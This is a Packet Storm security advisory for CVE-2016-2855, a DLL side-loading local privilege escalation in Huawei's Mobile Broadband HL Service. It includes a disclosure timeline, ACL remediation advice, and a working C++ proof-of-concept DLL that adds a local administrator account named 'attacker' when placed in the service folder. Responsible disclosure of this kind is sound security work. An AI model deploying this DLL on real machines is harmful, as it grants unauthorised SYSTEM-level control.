exploit the possibilities

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation
Posted May 12, 2016
Authored by Florian Bogner

Huawei Mobile Broadband HL Service versions 22.001.25.00.03 and below are vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.

tags | exploit
advisories | CVE-2016-2855
MD5 | 1e5fb53e7a9b0a870cea79231268057a

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

Change Mirror Download
Huawei Mobile Broadband HL Service Local Privilege Escalation

Metadata
===================================================
Release Date: 12-05-2016
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected versions: up to the current 22.001.25.00.03 on x86 and x64
Tested on: Windows 7 32 bit and 64 bit
CVE : CVE-2016-2855
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/
Video: https://youtu.be/MwtjE2PmEJU
Vulnerability Status: Fixed

Abstract
===================================================
The Windows service "Mobile Broadband HL Service" as installed by many? Huawei 3G/LTE modems is vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.

Disclosure Timeline
===================================================
6.3.2016: Issue privately reported to Huawei
6.3.2016: CVE number requested
7.3.2016: MITRE assigned CVE-2016-2855
14.3.2016: Huawei verified the issue and is working on a fix
9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However it is up to the carriers to push the fix to the devices.

Technical Details
===================================================
The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow normal users to add files a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot this DLL is loaded and executed as part of the service launch. This causes a Local Privilege Escalation as this service is run as LOCAL SYSTEM.

Proof of Concept
===================================================
#include <process.h>

/*
To compile 32bit dll:
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll

Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added
*/

/* export all required functions - use Dependency Walker to check what is needed */
extern "C"
{
__declspec(dllexport) int GetFileVersionInfoA();
__declspec(dllexport) int GetFileVersionInfoSizeA();
__declspec(dllexport) int VerQueryValueA();
}

/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
Otherwise this would cause several compile errors because of the already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded"
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");

return 0;
}

/* Implement stubs of our exports */
int GetFileVersionInfoA() {
return 0;
}

int GetFileVersionInfoSizeA() {
return 0;
}

int VerQueryValueA() {
return 0;
}

Suggested Solution
===================================================
The correct solution to prevent this attack is so change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder.

Workaround
===================================================
Until Huawei pushes a fix the filesystem ACLs should be updated manually to prevent normal users to write anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close